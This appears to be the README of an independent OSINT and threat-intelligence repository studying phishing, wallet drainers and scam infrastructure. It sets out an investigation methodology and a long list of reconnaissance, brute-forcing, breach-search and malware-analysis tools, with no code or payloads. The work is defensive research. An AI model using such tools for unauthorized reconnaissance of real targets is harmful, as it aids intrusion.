AtomLab1 is an independent digital risk and open-source intelligence (OSINT) research initiative focused on identifying, analyzing, and documenting online scam and phishing infrastructure.
This repository serves as a structured intelligence archive of real-world investigations into:
- Phishing campaigns
- Brand impersonation websites
- Wallet drainer operations
- Fraudulent online platforms
- Malicious APK distribution
- Scam infrastructure and attacker tooling
All investigations are conducted using publicly accessible information and follow strict ethical OSINT principles.
AtomLab1 emphasizes structured evidence documentation, infrastructure pattern recognition, and intelligence-grade reporting discipline.
The objective of AtomLab1 is to:
- Detect newly emerging scam infrastructure
- Analyze attacker tactics, techniques, and procedures (TTPs)
- Correlate malicious infrastructure patterns across campaigns
- Extract actionable Indicators of Compromise (IOCs)
- Develop structured digital risk investigation methodology
- Promote awareness and defensive intelligence practices
This project reflects a proactive digital risk detection mindset rather than reactive incident reporting.
This document defines the standardized, repeatable methodology used for every CTI report in this portfolio. All tools are free / open-source or have generous free tiers. No paid enterprise licenses required.
- Passive-first approach
- Multi-source verification
- Reproducibility & zero-harm testing
- Attack Chain Reconstruction (Cyber Kill Chain + MITRE ATT&CK)
- Target Identification & Triage
- Domain / Infrastructure Recon
- Web & Traffic Analysis
- APK / Malware Analysis
- Scam / Threat Feed Cross-Check
- Web3 / Blockchain Tracing
- Attack Chain & Risk Assessment
- Professional Report Writing
- AtSameIP - Find all websites hosted on the same host (IP-address)
- subfinder – Fast passive subdomain enumeration (download latest release)
- Amass – OWASP attack surface mapping & asset discovery
- findomain – Cross-platform subdomain enumerator
- assetfinder – Passive asset discovery
- Sublist3r – Subdomain enumeration (Python)
- SecurityTrails – Historical & passive DNS (free tier)
- DNSDumpster – Free DNS reconnaissance web tool
- Censys – Internet-wide asset search (free account)
- Shodan – Search engine for Internet-connected devices (free tier)
- Wayback Machine – Historical website snapshots
- Recon-ng – Full-featured reconnaissance framework
- theHarvester – Email, subdomain & employee OSINT
- SpiderFoot – Automated OSINT collection & correlation
- gobuster – Directory & DNS brute-forcing
- feroxbuster – Fast recursive content discovery
- dirb – Classic web content scanner
- katana – Next-generation crawling & spidering (ProjectDiscovery)
- nmap – Network discovery & security auditing
- Wappalyzer – Web technology fingerprinting (browser extension + online)
- BuiltWith – Website technology profiler
- WhatWeb – Website identification engine
- Burp Suite Community Edition – Web proxy & traffic interception (official download)
- OWASP ZAP – Free & open-source web app scanner
- urlscan.io – Website scanner & threat analysis (web-based)
- CheckPhish.ai – AI-powered phishing & threat detection (free scans)
- URLVoid – URL reputation & threat check (web-based)
- URLhaus – Real-time malicious URL database
- MalwareBazaar – Free malware sample repository (APKs included)
- ThreatFox – IoC sharing platform (abuse.ch)
- PhishTank – Community-driven phishing URL database
- OpenPhish – Real-time phishing feed
- AlienVault OTX – Open Threat Exchange (free account)
- VirusTotal – File & URL scanner (free tier)
- Hybrid-Analysis – Automated malware analysis (free)
- Any.Run – Interactive malware sandbox (free tier)
- MobSF (Mobile Security Framework) – All-in-one Android/iOS/Windows analysis (official repo + Docker)
- Apktool – Android APK reverse engineering
- Jadx-GUI – Dex to Java decompiler (GUI version)
- Frida – Dynamic instrumentation toolkit
- Ghidra – NSA reverse-engineering framework (download)
Explorers
- Etherscan – Ethereum blockchain explorer
- Blockchair – Multi-crypto blockchain explorer
- Solscan – Solana blockchain explorer Analytics & Tracing
- Arkham Intelligence – On-chain intelligence & entity tracking
- Breadcrumbs.app – Visual address clustering & fund flow
- ChainAbuse – Crypto scam reporting database
- BitcoinAbuse – Bitcoin scam address database
- Dune Analytics – On-chain query dashboard (free) Awesome Web3 OSINT List: aaarghhh/awesome_osint_blockchain_analysis
- Maltego CE – Community Edition link analysis
- ExifTool – Metadata reader/writer
- OSINT Framework – Web-based OSINT tool directory (clickable tree)
- Awesome OSINT (jivoi) – Most starred OSINT list
- Awesome OSINT (awesomelistsio) – High-quality curated edition
- Awesome OSINT For Everything – 200+ categories
- Awesome Intelligence – Threat intel focus
These tools are sourced from the Awesome OSINT repository and additional 2026 research, focusing on threat actor profiling, cyber threat maps, and intelligence feeds for monitoring criminal activities.
- Abusech – Hunt across all abuse.ch platforms with one simple query
- Cisco Talos Intelligence – IP and Domain Reputation Center for real-time threat detection
- Cloudflare Radar – Internet traffic patterns, attacks, and technology trends
- Criminal IP – Cyber Threat Intelligence Search Engine and Attack Surface Management(ASM) platform
- Fortiguard Labs – FortiGuard Outbreak Alerts for on-going cybersecurity attacks
- HCL Threat Map – Cyber Threat Map by HCLTech
- IBM X-Force Exchange – Current Malicious Activity map
- Imperva Live Threat Map – Real-time global view of DDoS attacks, hacking attempts, and bot assaults
- Kaspersky Cyberthreat Map – Live cyber-attack map
- LIONIC Cyber Threat Map – Global cyber threat visualization
- NETSCOUT Cyber Threat Map – Real-Time DDoS Attack Map
- Radware Live Cyber Threat Map – Near real-time information about cyberattacks
- Secure Gateway Live Cyber Threat Map – Live cyber threat visualization
- Thale's Cyberthreat Map – Cybersecurity trends with targeted areas, attacks, sectors, and malware
- ThreatsEye – Real-time visualization of global cyber attacks and threats
- Zscaler Global Threat Map Dashboard – 24-hour threats detected by antivirus engines and APTs
- APT Groups and Operations – Threat actors, sponsored countries, tools, methods
- APTWiki – Historical wiki with 214 actor entries
- Bi.Zone – 148 threat groups with detailed TTPs
- BreachHQ – List of all known cyber threat actors
- Cybergeist – Intelligence profiles about key threats and context
- Dark Web Informer – Tracking 854 Threat Actors
- ETDA – Search for Threat Actor groups and tools
- FortiGuard Labs – Actionable insights on threat actors
- KNOWLEDGENOW – Trending Threats
- lazarusholic – Total 203 threat actors
- Malpedia – List of threat actor groups
- MISP Galaxy – Adversary groups identified by 360.net
- OPENHUNTING.IO – Threat Library Collecting Information
- SOCRadar LABS – Threat actor profiles and activities
- Thales – Threat actor groups in graphical explorer
- Bitdefender Threat Map – Cyberthreat Real Time Map
- BunkerWeb Live Cyber Attack Threat Map – Live cyber attacks blocked by BunkerWeb
- Check Point Live Cyber Threat Map – Top cyber threats of 2026
- Threat Actor Usernames Scrape – 350k+ threat actor usernames from cybercrime sources
- GitGuardian – Monitor public GitHub for secrets
- OnionScan – Tool for investigating the Dark Web
- onion-lookup – Check Tor hidden services and metadata
- OTX AlienVault – Open Threat Exchange for collaborative threat sharing
- PhishingSecLists – Lists for fuzzing phishing and scam sites
- REScure Threat Intel Feed – Independent threat intelligence project
- Columbus Project – Advanced subdomain discovery service
- Merklemap – Enumerate all subdomains from certificate transparency logs
- aa419 Fake Sites Database – Fraudulent websites identified by Artists Against 419
- Abuseipdb – Repository of abuses for IPs, Domains, and subnets
- BGP.tools – Modern BGP toolkit for network reconnaissance
- BrightCloud – Reputation, category, and threats for URL or IP
- CertKit Certificate Search – Search for public SSL/TLS certificates
- FOFA – Asset search and analysis tool
- FullHunt – Secure External Attack Surface
- GrayNoise – Search Exposed Internet assets, Malicious IPs
- Hunter Search Engine – Search Exposed Internet assets
- Intelligence X – Search across dark web and data leaks
- Netlas.io – Network asset discovery
- ODIN – Search for Hosts, CVEs, Exposed Buckets
- Search Abuseipdb – Query IPs, ranges in AbuseIPDB
- Shadowserver – Global cyber threat statistics
These tools help in tracking malware locations, analyzing samples, and disassembling code to understand criminal techniques.
- MalwareBazaar – Search and download malware samples by hash, family, tag
- YARAify – Collaborative YARA engine for file pattern matching
- Cuckoo Sandbox – Open-source automated malware analysis system
- x64dbg – Open-source debugger for Windows binaries
- Wireshark – Network protocol analyzer for malware traffic
- Radare2 (r2) – Reverse engineering framework for static malware analysis
- IDA Pro – Interactive disassembler for binary analysis (free version available)
- OllyDbg – 32-bit debugger for Windows malware
- ClamAV – Open-source antivirus for malware detection
- Snort – Network intrusion detection for malware tracking
- Suricata – Network threat detection engine
- awesome-malware-analysis – Curated list of malware analysis tools
Tools focused on identifying, scanning, and analyzing scam websites and phishing campaigns.
- PhishStats – Phishing statistics and database
- urlDNA – Analyze URLs, monitor brands, track phishing sites
- Islegitsite – Checks website trustworthiness and security
- CredenShow – Identify compromised credentials
- HIB Ransomed – Check if data has been leaked
- HEROIC.NOW – Dark web data leak scanner
- IKnowYour.Dad – Data Breach Search Engine
- StealSeek – Search and analyze data breaches
- Venacus – Search for data breaches and notifications
- Ahmia – Dark Web Search Engine
- Aleph Open Search – Dark Web Search Engine
- DataSploit – Aggregates data from multiple sources
- Cyble ODIN – Scans internet assets, exposed buckets, vulnerabilities
- Google Dorks – Specialized Google queries for investigations
- NexVision – Large OSINT data pool for surface/dark web
- Hudson Rock – Cybercrime intelligence API
- Metagoofil – Metadata extraction from documents
- Recon-Ng – Reconnaissance framework
- Check Usernames – Username availability checker
- TinEye – Reverse image search
- Creepy – Geolocation OSINT tool
- Videris – Full-spectrum OSINT for collection and analysis
- i2 Analyst’s Notebook – Data visualization and analysis
- OSINT Industries – Tools for online investigations, fraud detection
- SL Crimewall – All-in-one OSINT for investigations
- Recorded Future – Threat intelligence with darknet monitoring
- Hunt.io – Tracks malicious infrastructure, C2 servers
- BeVigil-CLI – Searches assets from mobile apps
- Cyberbro – Searches and checks reputation of observables
- CyberGordon – Threat intelligence search with 30+ sources
- Discoshell – Discovery script using multiple tools
- FOCA – Metadata and hidden info finder
- Greynoise – Anti-Threat Intelligence for background noise
- IntelHub – Browser-based OSINT extension
- Orbit – Crypto wallet relationships crawler
- OSINT-Tool – Browser extension for OSINT utilities
- OSINT.SH – Information Gathering Toolset
- Photon – Crawler for OSINT
- SerpApi – Scrapes search engines
- SerpScan – PHP script for dorking
- Sintelix – Graphical link analysis for OSINT
- sn0int – Semi-automatic OSINT framework
- SpiderSuite – GUI web security crawler
- Sub3 Suite – Intelligence gathering suite
- Unfurl – Breaks down URLs for forensics
- Waybackurls – Fetches URLs from Wayback Machine
- Zen – Finds email addresses of GitHub users
- Lampyre – All-in-one OSINT for people, businesses, crypto
- Social Links (Crimewall) – Social media and dark web investigations
- Delivery (email, ad, fake site)
- Landing / Social Engineering
- Credential Harvesting / Seed Phrase Theft
- Proxy / C2 Layer (e.g., secureproxy.php)
- Exfiltration (Telegram bot, Google Apps Script, blockchain)
- Monetization (wallet drain, ransomware, etc.)
- Infrastructure Attribution (Cloudflare, Gandi, registrar, developer OSINT)
Cross-referenced with MITRE ATT&CK:
- TA0001 Initial Access
- TA0006 Credential Access
- TA0010 Exfiltration
- TA0040 Impact
This methodology + hyperlinked tool directory is publicly shared to demonstrate transparency, professionalism, and depth of knowledge to potential employers in the OSINT / Cyber Threat Intelligence field.
All reports in this repository follow a standardized naming structure.
File format:
CTI-<date>-<domain-name>
Example:
CTI-23022026-grafenocliente.digital
Meaning:
- Investigation conducted using AI-assisted automation workflow
- Includes automated data aggregation, structured analysis, and human review
- Follows evidence-controlled OSINT framework
File format:
CTI-<date>-<Normal-Title>
Example:
CTI-23022026-Fake-Trezor-Phishing-Campaign
Meaning:
- Fully conducted manually
- Deep infrastructure analysis and campaign correlation performed directly by the author
- No automated AI structuring used for primary analysis
This distinction ensures transparency regarding methodology and investigative depth.
- Digital risk detection
- Phishing infrastructure analysis
- Scam campaign correlation
- OSINT-based threat intelligence reporting
- IOC documentation and classification
- Infrastructure pivoting and correlation
- Pattern recognition across campaigns
- Evidence-based analytical reasoning
- Ethical open-source investigation discipline
All research within AtomLab1 adheres to the following principles:
- Only publicly accessible data is analyzed
- No unauthorized access or intrusion is performed
- No exploitation of vulnerabilities
- No bypass of authentication mechanisms
- No handling of private or leaked data
The focus is defensive intelligence and digital risk awareness.
AtomLab1 is authored and maintained by Jake Lo, an independent Digital Risk & OSINT Researcher.
This repository represents hands-on investigative work into real-world scam infrastructure, emerging phishing campaigns, and malicious online ecosystems.
The project reflects a structured approach to intelligence production, evidence control, and analytical discipline in digital risk research.
- Email: [email protected]
- LinkedIn: https://www.linkedin.com/in/lo-jake-b710643b1/
This repository is intended for educational, research, and defensive intelligence purposes only.
All findings are derived from publicly observable information at the time of investigation. No claim is made regarding legal determination of criminal activity.
Assessments reflect OSINT-based analysis and documented evidence at the time of reporting.
Stay alert. Detect early. Document clearly.